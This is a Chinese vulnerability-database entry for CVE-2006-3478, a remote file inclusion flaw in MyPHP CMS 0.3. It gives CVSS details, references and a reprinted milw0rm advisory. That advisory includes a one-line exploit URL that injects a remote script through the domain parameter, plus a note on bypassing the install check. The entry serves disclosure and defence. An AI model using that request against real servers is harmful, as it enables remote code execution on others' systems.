CVE-2006-3478
CVSS7.5
发布时间 :2006-07-10 16:05:00
修订时间 :2011-03-07 21:38:43
NMCOE    

[原文]PHP remote file inclusion vulnerability in styles/default/global_header.php in MyPHP CMS 0.3 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the domain parameter.


[CNNVD]MyPHP CMS 'global_header.php'远程文件包含漏洞(CNNVD-200607-123)

         MyPHP CMS是基于PHP的开放源码内容管理系统。
         MyPHP CMS实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
         在MyPHP CMS的global_header.php文件中没有正确地检查过滤$domain变量,如果register_globals=on的话,远程攻击者就可以利用简单的PHP代码注入脚本执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:myphp_cms:myphp_cms:0.3.1
cpe:/a:myphp_cms:myphp_cms:0.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3478
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3478
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-123
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/27538
(UNKNOWN)  XF  myphp-cms-globalheader-file-include(27538)
http://www.vupen.com/english/advisories/2006/2679
(UNKNOWN)  VUPEN  ADV-2006-2679
http://www.securityfocus.com/bid/18834
(UNKNOWN)  BID  18834
http://milw0rm.com/exploits/1983
(UNKNOWN)  MILW0RM  1983

- 漏洞信息

MyPHP CMS 'global_header.php'远程文件包含漏洞
高危 输入验证
2006-07-10 00:00:00 2006-07-12 00:00:00
远程  
         MyPHP CMS是基于PHP的开放源码内容管理系统。
         MyPHP CMS实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
         在MyPHP CMS的global_header.php文件中没有正确地检查过滤$domain变量,如果register_globals=on的话,远程攻击者就可以利用简单的PHP代码注入脚本执行任意命令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://sourceforge.net/projects/myphpcms

- 漏洞信息 (1983)

MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerability (EDBID:1983)
php webapps
2006-07-05 Verified
0 Kw3[R]Ln
N/A [点击下载]
---------------------------------------------------------------------------
MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabilities
---------------------------------------------------------------------------


Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MyPHP CMS
version : latest version [ 0.3 ]
URL : http://sourceforge.net/projects/myphpcms

------------------------------------------------------------------
Exploit:
~~~~~~~

Variable $domain not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.


# http://www.site.com/[path]/styles/default/global_header.php?installed=23&domain=[Evil_Script]

---------------------------------------------------------------------------

Solution :
~~~~~~~~~

declare variabel $domain
---------------------------------------------------------------------------


Shoutz:
~~~~~

# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and RST [ hTTp://RoSecurityGroup.net ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~

Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RoSecurityGroup.net
/*

-------------------------------- [ EOF] ----------------------------------

# Further Notes
if ( !isset ( $installed ) )
{
        header ( "Location: install_sql.php" );
}

added installed to the get request for the vulnerability to work correctly.

/str0ke

# milw0rm.com [2006-07-05]
		

- 漏洞信息

30929
MyPHP CMS global_header.php domain Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-07-05 Unknow
2006-07-05 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站